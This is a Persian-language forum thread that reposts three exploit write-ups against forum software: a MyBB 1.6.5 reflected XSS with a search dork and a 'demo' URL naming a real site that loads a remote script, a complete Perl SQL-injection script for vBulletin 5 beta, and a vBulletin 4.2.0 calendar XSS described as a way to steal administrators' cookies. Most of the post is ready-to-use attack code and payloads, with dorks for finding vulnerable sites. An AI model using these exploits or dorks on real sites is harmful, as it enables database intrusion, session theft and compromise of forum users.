تبلیغات در اینترنت

تبلیغات در اینترنتگیفت کارت گوگل پلی
نمایش نتایج: از 1 به 2 از 2

موضوع: ب وجود امدن باگ های خطرناک ویبوتلینmybb

  1. Top | #1

    پیش فرض ب وجود امدن باگ های خطرناک ویبوتلینmybb

    MyBB 1.6.5 XSS Vulnerability
    کد PHP:
    code]
    # Exploit Title: 0-day MyBB 1.6.5 XSS Vulnerability
    # Date: 25/12/2011 - 18:30
    # Author: Cyber White Hats
    # Nafsh
    # Site: Cyberwh.org
    # Mail: [email protected]
    # Software Website: http://www.mybb.com/
    # Tested On: BackTrack 5 - Win7 Ultimate
     
    Xp
    # Platform: Php

    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

    [$] 
    Dorksinurl:"tags.php" intext:"MyBB 1.6.5"

    [#] Vulnerable File : "/tags.php?tag="

    #POC: http://site.com/patch/tags.php?tag=[xss]

    [$] Demo Sites:
    http://gharian.ir/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E 

    vBulletin 5.0.0 SQL Exploit
    کد PHP:
    # Exploit Title: vBulletin 5 Beta XX SQLi 0day
    # Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
    # Date: 24/03/2013
    # Exploit Author: Orestis Kourides
    # Vendor Homepage: www.vbulletin.com
    # Software Link:
    # Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
    # Tested on: Linux
    # CVE : None

    #!/usr/bin/perl
    use LWP::UserAgent;
    use 
    HTTP::Cookies;
    use 
    HTTP::Request::Common;
    use 
    MIME::Base64;
    system $^O eq 'MSWin32' 'cls' 'clear';
    print 
    "
    +===================================================+
    |           vBulletin 5 Beta XX SQLi 0day           |
    |              Author: Orestis Kourides             |
    |             Web Site: www.cyitsec.net             |
    +===================================================+
    "
    ;
      
    if (@
    ARGV != 5) {
        print 
    "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
        exit;
    }
      
    $host       $ARGV[0];
    $path       $ARGV[1];
    $username   $ARGV[2];
    $password   $ARGV[3];
    $magicnum   $ARGV[4];
    $encpath    encode_base64('http://'.$host.$path);
    print 
    "[+] Logging\n";
    print 
    "[+] Username: ".$username."\n";
    print 
    "[+] Password: ".$password."\n";
    print 
    "[+] MagicNum: ".$magicnum."\n";
    print 
    "[+] " .$host.$path."auth/login\n";
    my $browser LWP::UserAgent->new;
    my $cookie_jar HTTP::Cookies->new;
    my $response $browser->post'http://'.$host.$path.'auth/login',
        [
            
    'url' => $encpath,
            
    'username' => $username,
            
    'password' => $password,
        ],
        
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
        
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $browser->cookie_jar$cookie_jar );
    my $browser LWP::UserAgent->new;
    $browser->cookie_jar$cookie_jar );
    print 
    "[+] Requesting\n";
    my $response $browser->post'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
        [
            
    'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select 
    (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),
    floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338'
    ,
        ],
        
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
    );
    $data $response->content;
    if (
    $data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
    print "\n";
    exit 
    1
    vBulletin 4.2.0 XSS Exploit

    کد PHP:
    $------------------------------------------------------------------------------------------------------------
    vBulletin 4.2.0 XSS Vulnerability 
    Author sangteamtham 
    Home Hcegroup.vn 
    Downloadhttp://members.vbulletin.com/ 
    Date :06/13/2012 
    Google Dork"Powered by vBulletin® Version 4.2.0"
    Twitterhttp://twitter.com/Sangte_amtham
    $*************************************************************************************************************
    1.vBulletin Description:

    Content publishingsearchsecurity, and more— vBulletin has it all
    Whether it’s available featuressupport, or ease-of-use, vBulletin offers the most for your money
    Learn more about what makes vBulletin the choice for people who are serious about creating 
    thriving online communities
    .

    2. Vulnerability Description:

    To steal cookie from administrator or any member in a forum or drive them to malicious sitesattacker will firstly create an accountthen come to 
    calendar section
    , and create an event for himself

    In titlehe will inject XSS code there. For sample:
    "><img src=x onerror=alert(1)> 

    In content section, he will write everything he likes. Now, he will send his profile to Administrator or any member
    and wait for cookie or victims' infection.

    http://127.0.0.1/vbb/member.php?id-xyz 




  2. گیفت کارت آیتونز

  3. Top | #2
    7aj
    کاربر سایت

    تاریخ عضویت
    Jan 2013
    ورژن ویبولتین
    vBulletin4
    نوشته ها
    137
    مورد پسند
    249 بار
    نوشته های وبلاگ
    2
    اطلاعات
    Windows XP Firefox 22.0
    میزان امتیاز
    22

    پیش فرض

    سلام اینو تایید میکنین؟

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. چگونگی اتصال پنل اس ام اس به ویبوتلین
    توسط masiha0 در انجمن پرسش و پاسخ
    پاسخ: 2
    آخرين نوشته: 2013/02/27, 11:39 PM
  2. مشکل با نصب ویبلوتن رو هاست
    توسط Siahkamar در انجمن پرسش و پاسخ
    پاسخ: 10
    آخرين نوشته: 2012/09/14, 01:36 PM
  3. کدام ورژن ویبیلوتن:
    توسط h.amir در انجمن پرسش و پاسخ
    پاسخ: 4
    آخرين نوشته: 2011/11/11, 08:53 PM
  4. ثبت نام با نام کاربری ادمین در ویبلوتن 4.1.0
    توسط vahshat در انجمن پرسش و پاسخ
    پاسخ: 6
    آخرين نوشته: 2010/12/29, 11:17 AM

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •